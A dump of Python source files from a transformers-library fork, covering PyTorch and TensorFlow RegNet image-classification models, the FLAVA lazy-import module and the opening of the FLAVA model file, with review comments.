            nn.Flatten(),
            # Identity head when `num_labels == 0` (pure feature extraction).
            nn.Linear(config.hidden_sizes[-1], config.num_labels) if config.num_labels > 0 else nn.Identity(),
        )
        # initialize weights and apply final processing
        self.post_init()
    @add_start_docstrings_to_model_forward(REGNET_INPUTS_DOCSTRING)
    @add_code_sample_docstrings(
        checkpoint=_IMAGE_CLASS_CHECKPOINT,
        output_type=ImageClassifierOutputWithNoAttention,
        config_class=_CONFIG_FOR_DOC,
        expected_output=_IMAGE_CLASS_EXPECTED_OUTPUT,
    )
    def forward(
        self,
        pixel_values: Optional[torch.FloatTensor] = None,
        labels: Optional[torch.LongTensor] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
    ) -> ImageClassifierOutputWithNoAttention:
        r"""
        labels (`torch.LongTensor` of shape `(batch_size,)`, *optional*):
            Labels for computing the image classification/regression loss. Indices should be in `[0, ...,
            config.num_labels - 1]`. If `config.num_labels > 1` a classification loss is computed (Cross-Entropy).
        """
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict
        outputs = self.regnet(pixel_values, output_hidden_states=output_hidden_states, return_dict=return_dict)
        # Pooled features: `pooler_output` on the dict path, index 1 on the tuple path.
        pooled_output = outputs.pooler_output if return_dict else outputs[1]
        logits = self.classifier(pooled_output)
        loss = None
        if labels is not None:
            # Infer the problem type once from label count / label dtype, then cache it on the config.
            if self.config.problem_type is None:
                if self.num_labels == 1:
                    self.config.problem_type = "regression"
                elif self.num_labels > 1 and (labels.dtype == torch.long or labels.dtype == torch.int):
                    self.config.problem_type = "single_label_classification"
                else:
                    self.config.problem_type = "multi_label_classification"
            if self.config.problem_type == "regression":
                loss_fct = MSELoss()
                if self.num_labels == 1:
                    # Single-output regression: squeeze trailing dims to match label shape.
                    loss = loss_fct(logits.squeeze(), labels.squeeze())
                else:
                    loss = loss_fct(logits, labels)
            elif self.config.problem_type == "single_label_classification":
                loss_fct = CrossEntropyLoss()
                loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))
            elif self.config.problem_type == "multi_label_classification":
                loss_fct = BCEWithLogitsLoss()
                loss = loss_fct(logits, labels)
        if not return_dict:
            # Skip last_hidden_state/pooled_output (indices 0-1); keep hidden_states if present.
            output = (logits,) + outputs[2:]
            return (loss,) + output if loss is not None else output
        return ImageClassifierOutputWithNoAttention(loss=loss, logits=logits, hidden_states=outputs.hidden_states)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 21,002 | src/transformers/models/regnet/modeling_tf_regnet.py | # coding=utf-8
# Copyright 2022 Meta Platforms, Inc. and The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" TensorFlow RegNet model."""
from typing import Dict, Optional, Tuple, Union
import tensorflow as tf
from ...activations_tf import ACT2FN
from ...file_utils import add_code_sample_docstrings, add_start_docstrings, add_start_docstrings_to_model_forward
from ...modeling_tf_outputs import (
TFBaseModelOutputWithNoAttention,
TFBaseModelOutputWithPoolingAndNoAttention,
TFSequenceClassifierOutput,
)
from ...modeling_tf_utils import TFPreTrainedModel, TFSequenceClassificationLoss, keras_serializable, unpack_inputs
from ...tf_utils import shape_list
from ...utils import logging
from .configuration_regnet import RegNetConfig
logger = logging.get_logger(__name__)
# General docstring
_CONFIG_FOR_DOC = "RegNetConfig"
# Base docstring
_CHECKPOINT_FOR_DOC = "facebook/regnet-y-040"
# Expected feature-map shape (batch, channels, height, width) used by the doc example.
_EXPECTED_OUTPUT_SHAPE = [1, 1088, 7, 7]
# Image classification docstring
_IMAGE_CLASS_CHECKPOINT = "facebook/regnet-y-040"
_IMAGE_CLASS_EXPECTED_OUTPUT = "tabby, tabby cat"
# Hub checkpoint ids with pretrained TF weights for this architecture.
TF_REGNET_PRETRAINED_MODEL_ARCHIVE_LIST = [
    "facebook/regnet-y-040",
    # See all regnet models at https://huggingface.co/models?filter=regnet
]
class TFRegNetConvLayer(tf.keras.layers.Layer):
    """Basic RegNet building block: explicit padding -> convolution -> batch norm -> activation."""

    def __init__(
        self,
        out_channels: int,
        kernel_size: int = 3,
        stride: int = 1,
        groups: int = 1,
        activation: Optional[str] = "relu",
        **kwargs,
    ):
        super().__init__(**kwargs)
        # Explicit zero-padding plus a VALID convolution reproduces the PyTorch padding; verified in
        # https://colab.research.google.com/gist/sayakpaul/854bc10eeaf21c9ee2119e0b9f3841a7/scratchpad.ipynb
        self.padding = tf.keras.layers.ZeroPadding2D(padding=kernel_size // 2)
        self.convolution = tf.keras.layers.Conv2D(
            filters=out_channels,
            kernel_size=kernel_size,
            strides=stride,
            padding="VALID",
            groups=groups,
            use_bias=False,
            name="convolution",
        )
        self.normalization = tf.keras.layers.BatchNormalization(epsilon=1e-5, momentum=0.9, name="normalization")
        # `activation=None` means a pass-through (identity) nonlinearity.
        if activation is None:
            self.activation = tf.identity
        else:
            self.activation = ACT2FN[activation]

    def call(self, hidden_state):
        padded = self.padding(hidden_state)
        convolved = self.convolution(padded)
        normalized = self.normalization(convolved)
        return self.activation(normalized)
class TFRegNetEmbeddings(tf.keras.layers.Layer):
    """
    RegNet stem: a single aggressive (strided) convolution that embeds the input pixels.
    """

    def __init__(self, config: RegNetConfig, **kwargs):
        super().__init__(**kwargs)
        self.num_channels = config.num_channels
        self.embedder = TFRegNetConvLayer(
            out_channels=config.embedding_size,
            kernel_size=3,
            stride=2,
            activation=config.hidden_act,
            name="embedder",
        )

    def call(self, pixel_values):
        # Inputs arrive in NCHW, so the channel axis is dimension 1; the check only
        # runs eagerly because static shapes may be unknown when tracing.
        if tf.executing_eagerly() and shape_list(pixel_values)[1] != self.num_channels:
            raise ValueError(
                "Make sure that the channel dimension of the pixel values match with the one set in the configuration."
            )
        # `tf.keras.layers.Conv2D` does not support NCHW on CPU, so convert the input
        # to NHWC (batch, height, width, channels) before running the stem.
        nhwc_pixel_values = tf.transpose(pixel_values, perm=(0, 2, 3, 1))
        return self.embedder(nhwc_pixel_values)
class TFRegNetShortCut(tf.keras.layers.Layer):
    """
    Projection shortcut for the residual branch: a 1x1 convolution that matches the channel
    count and, when `stride=2`, also downsamples the input spatially.
    """

    def __init__(self, out_channels: int, stride: int = 2, **kwargs):
        super().__init__(**kwargs)
        self.convolution = tf.keras.layers.Conv2D(
            filters=out_channels, kernel_size=1, strides=stride, use_bias=False, name="convolution"
        )
        self.normalization = tf.keras.layers.BatchNormalization(epsilon=1e-5, momentum=0.9, name="normalization")

    def call(self, inputs: tf.Tensor, training: bool = False) -> tf.Tensor:
        projected = self.convolution(inputs)
        return self.normalization(projected, training=training)
class TFRegNetSELayer(tf.keras.layers.Layer):
    """
    Squeeze and Excitation layer (SE) proposed in [Squeeze-and-Excitation Networks](https://arxiv.org/abs/1709.01507).
    """
    def __init__(self, in_channels: int, reduced_channels: int, **kwargs):
        super().__init__(**kwargs)
        # "Squeeze": global average pool keeping a (batch, 1, 1, channels) shape.
        self.pooler = tf.keras.layers.GlobalAveragePooling2D(keepdims=True, name="pooler")
        # "Excite": bottleneck to `reduced_channels` then back up, ending in a sigmoid gate.
        # NOTE(review): the names skip "attention.1" — presumably to line up with the
        # PyTorch `nn.Sequential` indices (activation at index 1); confirm before renaming.
        self.attention = [
            tf.keras.layers.Conv2D(filters=reduced_channels, kernel_size=1, activation="relu", name="attention.0"),
            tf.keras.layers.Conv2D(filters=in_channels, kernel_size=1, activation="sigmoid", name="attention.2"),
        ]
    def call(self, hidden_state):
        # [batch_size, h, w, num_channels] -> [batch_size, 1, 1, num_channels]
        pooled = self.pooler(hidden_state)
        for layer_module in self.attention:
            pooled = layer_module(pooled)
        # Per-channel gating of the input features (broadcast over h and w).
        hidden_state = hidden_state * pooled
        return hidden_state
class TFRegNetXLayer(tf.keras.layers.Layer):
    """
    RegNet's layer composed by three `3x3` convolutions, same as a ResNet bottleneck layer with reduction = 1.
    """
    # NOTE(review): as constructed below the convs are 1x1 -> 3x3 (grouped) -> 1x1,
    # not three 3x3 convs as the (upstream) summary above suggests.
    def __init__(self, config: RegNetConfig, in_channels: int, out_channels: int, stride: int = 1, **kwargs):
        super().__init__(**kwargs)
        # A projection shortcut is only needed when the residual branch changes the
        # channel count or the spatial resolution; otherwise use an identity.
        should_apply_shortcut = in_channels != out_channels or stride != 1
        # Grouped-convolution group count derived from the configured group width; at least 1.
        groups = max(1, out_channels // config.groups_width)
        self.shortcut = (
            TFRegNetShortCut(out_channels, stride=stride, name="shortcut")
            if should_apply_shortcut
            else tf.keras.layers.Activation("linear", name="shortcut")
        )
        # `self.layers` instead of `self.layer` because that is a reserved argument.
        self.layers = [
            TFRegNetConvLayer(out_channels, kernel_size=1, activation=config.hidden_act, name="layer.0"),
            TFRegNetConvLayer(
                out_channels, stride=stride, groups=groups, activation=config.hidden_act, name="layer.1"
            ),
            # No activation on the last conv: the nonlinearity is applied after the residual add.
            TFRegNetConvLayer(out_channels, kernel_size=1, activation=None, name="layer.2"),
        ]
        self.activation = ACT2FN[config.hidden_act]
    def call(self, hidden_state):
        residual = hidden_state
        for layer_module in self.layers:
            hidden_state = layer_module(hidden_state)
        residual = self.shortcut(residual)
        hidden_state += residual
        hidden_state = self.activation(hidden_state)
        return hidden_state
class TFRegNetYLayer(tf.keras.layers.Layer):
    """
    RegNet's Y layer: an X layer with Squeeze and Excitation.
    """
    def __init__(self, config: RegNetConfig, in_channels: int, out_channels: int, stride: int = 1, **kwargs):
        super().__init__(**kwargs)
        # Projection shortcut only when channels or resolution change; identity otherwise.
        should_apply_shortcut = in_channels != out_channels or stride != 1
        # Grouped-convolution group count from the configured group width; at least 1.
        groups = max(1, out_channels // config.groups_width)
        self.shortcut = (
            TFRegNetShortCut(out_channels, stride=stride, name="shortcut")
            if should_apply_shortcut
            else tf.keras.layers.Activation("linear", name="shortcut")
        )
        # Same stack as the X layer plus an SE block (reduction 4) before the last conv.
        self.layers = [
            TFRegNetConvLayer(out_channels, kernel_size=1, activation=config.hidden_act, name="layer.0"),
            TFRegNetConvLayer(
                out_channels, stride=stride, groups=groups, activation=config.hidden_act, name="layer.1"
            ),
            TFRegNetSELayer(out_channels, reduced_channels=int(round(in_channels / 4)), name="layer.2"),
            # No activation on the last conv: applied after the residual add below.
            TFRegNetConvLayer(out_channels, kernel_size=1, activation=None, name="layer.3"),
        ]
        self.activation = ACT2FN[config.hidden_act]
    def call(self, hidden_state):
        residual = hidden_state
        for layer_module in self.layers:
            hidden_state = layer_module(hidden_state)
        residual = self.shortcut(residual)
        hidden_state += residual
        hidden_state = self.activation(hidden_state)
        return hidden_state
class TFRegNetStage(tf.keras.layers.Layer):
    """
    One RegNet stage: `depth` stacked X or Y layers, downsampling in the first one.
    """

    def __init__(
        self, config: RegNetConfig, in_channels: int, out_channels: int, stride: int = 2, depth: int = 2, **kwargs
    ):
        super().__init__(**kwargs)
        layer_cls = TFRegNetXLayer if config.layer_type == "x" else TFRegNetYLayer
        # The first layer handles the channel change and (via its stride) the downsampling;
        # the remaining `depth - 1` layers keep the shape fixed.
        stage_layers = [layer_cls(config, in_channels, out_channels, stride=stride, name="layers.0")]
        for i in range(depth - 1):
            stage_layers.append(layer_cls(config, out_channels, out_channels, name=f"layers.{i+1}"))
        self.layers = stage_layers

    def call(self, hidden_state):
        for stage_layer in self.layers:
            hidden_state = stage_layer(hidden_state)
        return hidden_state
class TFRegNetEncoder(tf.keras.layers.Layer):
    # Chains all RegNet stages and optionally collects intermediate hidden states.
    def __init__(self, config: RegNetConfig, **kwargs):
        super().__init__(**kwargs)
        self.stages = []
        # based on `downsample_in_first_stage`, the first layer of the first stage may or may not downsample the input
        self.stages.append(
            TFRegNetStage(
                config,
                config.embedding_size,
                config.hidden_sizes[0],
                stride=2 if config.downsample_in_first_stage else 1,
                depth=config.depths[0],
                name="stages.0",
            )
        )
        # Remaining stages chain consecutive hidden sizes: (h[0]->h[1]), (h[1]->h[2]), ...
        in_out_channels = zip(config.hidden_sizes, config.hidden_sizes[1:])
        for i, ((in_channels, out_channels), depth) in enumerate(zip(in_out_channels, config.depths[1:])):
            self.stages.append(TFRegNetStage(config, in_channels, out_channels, depth=depth, name=f"stages.{i+1}"))
    def call(
        self, hidden_state: tf.Tensor, output_hidden_states: bool = False, return_dict: bool = True
    ) -> TFBaseModelOutputWithNoAttention:
        # Collects the *input* to each stage plus the final output, so the tuple has
        # len(stages) + 1 entries when hidden states are requested.
        hidden_states = () if output_hidden_states else None
        for stage_module in self.stages:
            if output_hidden_states:
                hidden_states = hidden_states + (hidden_state,)
            hidden_state = stage_module(hidden_state)
        if output_hidden_states:
            hidden_states = hidden_states + (hidden_state,)
        if not return_dict:
            # Tuple output drops `None` entries: (last_hidden_state,[ hidden_states]).
            return tuple(v for v in [hidden_state, hidden_states] if v is not None)
        return TFBaseModelOutputWithNoAttention(last_hidden_state=hidden_state, hidden_states=hidden_states)
@keras_serializable
class TFRegNetMainLayer(tf.keras.layers.Layer):
    """
    Core RegNet network (stem -> stages -> pooler) shared by `TFRegNetModel` and
    `TFRegNetForImageClassification`.

    All outputs are converted to NCHW to match the PyTorch implementation, even though
    the internal computation runs in NHWC (Keras Conv2D does not support NCHW on CPU).
    """

    config_class = RegNetConfig

    def __init__(self, config, **kwargs):
        super().__init__(**kwargs)
        self.config = config
        self.embedder = TFRegNetEmbeddings(config, name="embedder")
        self.encoder = TFRegNetEncoder(config, name="encoder")
        # Global average pooling; `keepdims=True` keeps a (batch, 1, 1, channels) shape.
        self.pooler = tf.keras.layers.GlobalAveragePooling2D(keepdims=True, name="pooler")

    @unpack_inputs
    def call(
        self,
        pixel_values: tf.Tensor,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
        training: bool = False,
    ) -> TFBaseModelOutputWithPoolingAndNoAttention:
        # Fall back to config defaults when flags are not passed explicitly.
        output_hidden_states = (
            output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
        )
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict
        embedding_output = self.embedder(pixel_values, training=training)
        encoder_outputs = self.encoder(
            embedding_output, output_hidden_states=output_hidden_states, return_dict=return_dict, training=training
        )
        last_hidden_state = encoder_outputs[0]
        pooled_output = self.pooler(last_hidden_state)
        # Change to NCHW output format have uniformity in the modules
        pooled_output = tf.transpose(pooled_output, perm=(0, 3, 1, 2))
        last_hidden_state = tf.transpose(last_hidden_state, perm=(0, 3, 1, 2))
        # Change the other hidden state outputs to NCHW as well
        if output_hidden_states:
            hidden_states = tuple(tf.transpose(h, perm=(0, 3, 1, 2)) for h in encoder_outputs[1])
        if not return_dict:
            # BUGFIX: the tuple path previously returned `encoder_outputs[1:]`, whose hidden
            # states were still NHWC, while the dict path returned the NCHW-transposed ones.
            # Return the transposed tuple so both paths use the same (NCHW) layout.
            if output_hidden_states:
                return (last_hidden_state, pooled_output, hidden_states)
            return (last_hidden_state, pooled_output)
        return TFBaseModelOutputWithPoolingAndNoAttention(
            last_hidden_state=last_hidden_state,
            pooler_output=pooled_output,
            hidden_states=hidden_states if output_hidden_states else encoder_outputs.hidden_states,
        )
class TFRegNetPreTrainedModel(TFPreTrainedModel):
    """
    An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained
    models.
    """
    config_class = RegNetConfig
    # Attribute name under which the base model lives in head models (e.g. `self.regnet`).
    base_model_prefix = "regnet"
    main_input_name = "pixel_values"
    @property
    def dummy_inputs(self) -> Dict[str, tf.Tensor]:
        """
        Dummy inputs to build the network.
        Returns:
            `Dict[str, tf.Tensor]`: The dummy inputs.
        """
        # NCHW dummy batch of 3 images at 224x224, matching `main_input_name`.
        VISION_DUMMY_INPUTS = tf.random.uniform(shape=(3, self.config.num_channels, 224, 224), dtype=tf.float32)
        return {"pixel_values": tf.constant(VISION_DUMMY_INPUTS)}
    @tf.function(
        input_signature=[
            {
                # Fully dynamic shape so the SavedModel signature accepts any batch/image size.
                "pixel_values": tf.TensorSpec((None, None, None, None), tf.float32, name="pixel_values"),
            }
        ]
    )
    def serving(self, inputs):
        """
        Method used for serving the model.
        Args:
            inputs (`Dict[str, tf.Tensor]`):
                The input of the saved model as a dictionary of tensors.
        """
        output = self.call(inputs)
        return self.serving_output(output)
# Shared class-level docstring. Fixed ordering: the general description comes first and the
# `config` entry is nested under the `Parameters:` header, so generated docs render correctly.
REGNET_START_DOCSTRING = r"""
    This model is a Tensorflow
    [tf.keras.layers.Layer](https://www.tensorflow.org/api_docs/python/tf/keras/layers/Layer) sub-class. Use it as a
    regular Tensorflow Module and refer to the Tensorflow documentation for all matter related to general usage and
    behavior.

    Parameters:
        config ([`RegNetConfig`]): Model configuration class with all the parameters of the model.
            Initializing with a config file does not load the weights associated with the model, only the
            configuration. Check out the [`~TFPreTrainedModel.from_pretrained`] method to load the model weights.
"""
# Shared forward-pass docstring. Fixed typo: `ConveNextImageProcessor` -> `ConvNextImageProcessor`
# (the misspelled cross-reference would not resolve in the generated docs; the PyTorch twin of
# this file already uses the correct spelling).
REGNET_INPUTS_DOCSTRING = r"""
    Args:
        pixel_values (`tf.Tensor` of shape `(batch_size, num_channels, height, width)`):
            Pixel values. Pixel values can be obtained using [`AutoImageProcessor`]. See
            [`ConvNextImageProcessor.__call__`] for details.
        output_hidden_states (`bool`, *optional*):
            Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for
            more detail.
        return_dict (`bool`, *optional*):
            Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple.
"""
@add_start_docstrings(
    "The bare RegNet model outputting raw features without any specific head on top.",
    REGNET_START_DOCSTRING,
)
class TFRegNetModel(TFRegNetPreTrainedModel):
    # Thin wrapper exposing `TFRegNetMainLayer` as a standalone (headless) model.
    def __init__(self, config: RegNetConfig, *inputs, **kwargs):
        super().__init__(config, *inputs, **kwargs)
        self.regnet = TFRegNetMainLayer(config, name="regnet")
    @unpack_inputs
    @add_start_docstrings_to_model_forward(REGNET_INPUTS_DOCSTRING)
    @add_code_sample_docstrings(
        checkpoint=_CHECKPOINT_FOR_DOC,
        output_type=TFBaseModelOutputWithPoolingAndNoAttention,
        config_class=_CONFIG_FOR_DOC,
        modality="vision",
        expected_output=_EXPECTED_OUTPUT_SHAPE,
    )
    def call(
        self,
        pixel_values: tf.Tensor,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
        training: bool = False,
    ) -> Union[TFBaseModelOutputWithPoolingAndNoAttention, Tuple[tf.Tensor]]:
        # Fall back to config defaults when flags are not passed explicitly.
        output_hidden_states = (
            output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
        )
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict
        outputs = self.regnet(
            pixel_values=pixel_values,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
            training=training,
        )
        if not return_dict:
            # Pass the main layer's tuple through unchanged.
            return (outputs[0],) + outputs[1:]
        return TFBaseModelOutputWithPoolingAndNoAttention(
            last_hidden_state=outputs.last_hidden_state,
            pooler_output=outputs.pooler_output,
            hidden_states=outputs.hidden_states,
        )
    def serving_output(
        self, output: TFBaseModelOutputWithPoolingAndNoAttention
    ) -> TFBaseModelOutputWithPoolingAndNoAttention:
        # hidden_states not converted to Tensor with tf.convert_to_tensor as they are all of different dimensions
        return TFBaseModelOutputWithPoolingAndNoAttention(
            last_hidden_state=output.last_hidden_state,
            pooler_output=output.pooler_output,
            hidden_states=output.hidden_states,
        )
@add_start_docstrings(
    """
    RegNet Model with an image classification head on top (a linear layer on top of the pooled features), e.g. for
    ImageNet.
    """,
    REGNET_START_DOCSTRING,
)
class TFRegNetForImageClassification(TFRegNetPreTrainedModel, TFSequenceClassificationLoss):
    def __init__(self, config: RegNetConfig, *inputs, **kwargs):
        super().__init__(config, *inputs, **kwargs)
        self.num_labels = config.num_labels
        self.regnet = TFRegNetMainLayer(config, name="regnet")
        # classification head
        # NOTE(review): the layer name "classifier.1" skips index 0 — presumably to match
        # the PyTorch `nn.Sequential(Flatten, Linear)` weight names; confirm before changing.
        self.classifier = [
            tf.keras.layers.Flatten(),
            tf.keras.layers.Dense(config.num_labels, name="classifier.1") if config.num_labels > 0 else tf.identity,
        ]
    @unpack_inputs
    @add_start_docstrings_to_model_forward(REGNET_INPUTS_DOCSTRING)
    @add_code_sample_docstrings(
        checkpoint=_IMAGE_CLASS_CHECKPOINT,
        output_type=TFSequenceClassifierOutput,
        config_class=_CONFIG_FOR_DOC,
        expected_output=_IMAGE_CLASS_EXPECTED_OUTPUT,
    )
    def call(
        self,
        pixel_values: Optional[tf.Tensor] = None,
        labels: Optional[tf.Tensor] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
        training: bool = False,
    ) -> Union[TFSequenceClassifierOutput, Tuple[tf.Tensor]]:
        r"""
        labels (`tf.Tensor` of shape `(batch_size,)`, *optional*):
            Labels for computing the image classification/regression loss. Indices should be in `[0, ...,
            config.num_labels - 1]`. If `config.num_labels > 1` a classification loss is computed (Cross-Entropy).
        """
        output_hidden_states = (
            output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
        )
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict
        outputs = self.regnet(
            pixel_values, output_hidden_states=output_hidden_states, return_dict=return_dict, training=training
        )
        # Pooled features: `pooler_output` on the dict path, index 1 on the tuple path.
        pooled_output = outputs.pooler_output if return_dict else outputs[1]
        flattened_output = self.classifier[0](pooled_output)
        logits = self.classifier[1](flattened_output)
        # Loss computation is inherited from TFSequenceClassificationLoss.
        loss = None if labels is None else self.hf_compute_loss(labels=labels, logits=logits)
        if not return_dict:
            # Skip last_hidden_state/pooled_output; keep hidden_states if present.
            output = (logits,) + outputs[2:]
            return ((loss,) + output) if loss is not None else output
        return TFSequenceClassifierOutput(loss=loss, logits=logits, hidden_states=outputs.hidden_states)
    def serving_output(self, output: TFSequenceClassifierOutput) -> TFSequenceClassifierOutput:
        # hidden_states not converted to Tensor with tf.convert_to_tensor as they are all of different dimensions
        return TFSequenceClassifierOutput(logits=output.logits, hidden_states=output.hidden_states)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 3,030 | src/transformers/models/flava/__init__.py | # Copyright 2022 Meta Platforms authors and The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import TYPE_CHECKING
from ...utils import OptionalDependencyNotAvailable, _LazyModule, is_torch_available, is_vision_available
# Lazy import structure: submodules are only imported when first accessed, which keeps
# `import transformers` fast and avoids pulling in optional dependencies eagerly.
_import_structure = {
    "configuration_flava": [
        "FLAVA_PRETRAINED_CONFIG_ARCHIVE_MAP",
        "FlavaConfig",
        "FlavaImageCodebookConfig",
        "FlavaImageConfig",
        "FlavaMultimodalConfig",
        "FlavaTextConfig",
    ],
}
try:
    if not is_vision_available():
        raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
    pass
else:
    # Image processing / processor classes require the vision extras.
    _import_structure["feature_extraction_flava"] = ["FlavaFeatureExtractor"]
    _import_structure["image_processing_flava"] = ["FlavaImageProcessor"]
    _import_structure["processing_flava"] = ["FlavaProcessor"]
try:
    if not is_torch_available():
        raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
    pass
else:
    # Modeling classes require PyTorch.
    _import_structure["modeling_flava"] = [
        "FLAVA_PRETRAINED_MODEL_ARCHIVE_LIST",
        "FlavaForPreTraining",
        "FlavaImageCodebook",
        "FlavaImageModel",
        "FlavaModel",
        "FlavaMultimodalModel",
        "FlavaPreTrainedModel",
        "FlavaTextModel",
    ]
# Under TYPE_CHECKING, import everything eagerly so static analyzers and IDEs see real symbols.
if TYPE_CHECKING:
    from .configuration_flava import (
        FLAVA_PRETRAINED_CONFIG_ARCHIVE_MAP,
        FlavaConfig,
        FlavaImageCodebookConfig,
        FlavaImageConfig,
        FlavaMultimodalConfig,
        FlavaTextConfig,
    )
    try:
        if not is_vision_available():
            raise OptionalDependencyNotAvailable()
    except OptionalDependencyNotAvailable:
        pass
    else:
        from .feature_extraction_flava import FlavaFeatureExtractor
        from .image_processing_flava import FlavaImageProcessor
        from .processing_flava import FlavaProcessor
    try:
        if not is_torch_available():
            raise OptionalDependencyNotAvailable()
    except OptionalDependencyNotAvailable:
        pass
    else:
        from .modeling_flava import (
            FLAVA_PRETRAINED_MODEL_ARCHIVE_LIST,
            FlavaForPreTraining,
            FlavaImageCodebook,
            FlavaImageModel,
            FlavaModel,
            FlavaMultimodalModel,
            FlavaPreTrainedModel,
            FlavaTextModel,
        )
else:
    # At runtime, replace this module with a lazy proxy that resolves names on demand.
    import sys
    sys.modules[__name__] = _LazyModule(__name__, globals()["__file__"], _import_structure, module_spec=__spec__)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 96,517 | src/transformers/models/flava/modeling_flava.py | # coding=utf-8
# Copyright 2022 Meta Platforms authors and The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" PyTorch FLAVA model."""
import collections
import math
from collections import OrderedDict
from dataclasses import dataclass
from typing import Any, Dict, List, Optional, Set, Tuple, Union
import torch
import torch.utils.checkpoint
from torch import nn
from ...activations import ACT2FN
from ...modeling_outputs import BaseModelOutput, BaseModelOutputWithPooling
from ...modeling_utils import PreTrainedModel, find_pruneable_heads_and_indices, prune_linear_layer
from ...utils import (
ModelOutput,
add_code_sample_docstrings,
add_start_docstrings,
add_start_docstrings_to_model_forward,
logging,
replace_return_docstrings,
)
from .configuration_flava import (
FlavaConfig,
FlavaImageCodebookConfig,
FlavaImageConfig,
FlavaMultimodalConfig,
FlavaTextConfig,
)
logger = logging.get_logger(__name__)
_CHECKPOINT_FOR_DOC = "facebook/flava-full"
# Codebook docstring
_CHECKPOINT_FOR_CODEBOOK_DOC = "facebook/flava-image-codebook"
_CONFIG_CLASS_FOR_IMAGE_MODEL_DOC = "FlavaImageConfig"
_CONFIG_CLASS_FOR_TEXT_MODEL_DOC = "FlavaTextConfig"
_CONFIG_CLASS_FOR_MULTIMODAL_MODEL_DOC = "FlavaMultimodalConfig"
# Expected image-model output shape (batch, sequence, hidden) for the doc example.
_EXPECTED_IMAGE_OUTPUT_SHAPE = [1, 197, 768]
FLAVA_PRETRAINED_MODEL_ARCHIVE_LIST = [
    "facebook/flava-full",
    # See all flava models at https://huggingface.co/models?filter=flava
]
FLAVA_CODEBOOK_PRETRAINED_MODEL_ARCHIVE_LIST = ["facebook/flava-image-codebook"]
# Clamp bounds for the learnable `logit_scale`; 4.6052 ~= ln(100) — presumably
# following the CLIP convention of capping the temperature at 100. TODO confirm.
LOGIT_SCALE_CLAMP_MIN = 0
LOGIT_SCALE_CLAMP_MAX = 4.6052
# Union of the per-modality config types accepted by helpers shared across encoders.
FlavaPossibleConfigs = Union[FlavaTextConfig, FlavaImageConfig, FlavaMultimodalConfig]
@dataclass
class FlavaModelOutput(ModelOutput):
    """
    Output from FlavaModel containing embeddings and outputs from individual encoders.
    Note that `image_embeddings` and `text_embeddings` returned are similar to pooled output returned from a
    transformer. If you want embeddings for contrastive loss or retrieval use a FLAVA model's `image_projection` and
    `text_projection` layers on `image_embeddings` and `text_embeddings` respectively.
    Args:
        image_embeddings (`torch.FloatTensor` of shape `(batch_size, output_dim)`, *optional*, returned when `pixel_values` are present):
            The image embeddings which are basically the pooled output of [`FlavaImageModel`].
        image_output (`BaseModelOutputWithPooling`, *optional*, returned when `pixel_values` are present):
            The output of the [`FlavaImageModel`].
        text_embeddings (`torch.FloatTensor` of shape `(batch_size, output_dim)`, *optional*, returned when `input_ids` are present):
            The text embeddings which are basically the pooled output of [`FlavaTextModel`].
        text_output (`BaseModelOutputWithPooling`, *optional*, returned when `input_ids` are present):
            The output of the [`FlavaTextModel`].
        multimodal_embeddings (`torch.FloatTensor` of shape `(batch_size, output_dim)`, *optional*, returned when `input_ids` and `pixel_values` are present and `skip_multimodal_encoder` is `None` or `False`):
            The multimodal embeddings which are basically the pooled output of [`FlavaTextModel`].
        multimodal_output (`BaseModelOutputWithPooling`, returned when `input_ids` and `pixel_values` are present and `skip_multimodal_encoder` is `None` or `False`):
            The output of the [`FlavaMultimodalModel`].
    """
    image_embeddings: Optional[torch.FloatTensor] = None
    image_output: Optional[BaseModelOutputWithPooling] = None
    text_embeddings: Optional[torch.FloatTensor] = None
    text_output: Optional[BaseModelOutputWithPooling] = None
    multimodal_embeddings: Optional[torch.FloatTensor] = None
    multimodal_output: Optional[BaseModelOutputWithPooling] = None

    def to_tuple(self) -> Tuple[Any]:
        # Nested transformer outputs are flattened to tuples themselves; every other
        # entry is passed through unchanged.
        nested_output_keys = ("text_output", "image_output", "multimodal_output")
        flattened = []
        for key in self.keys():
            if key in nested_output_keys:
                flattened.append(getattr(self, key).to_tuple())
            else:
                flattened.append(self[key])
        return tuple(flattened)
@dataclass
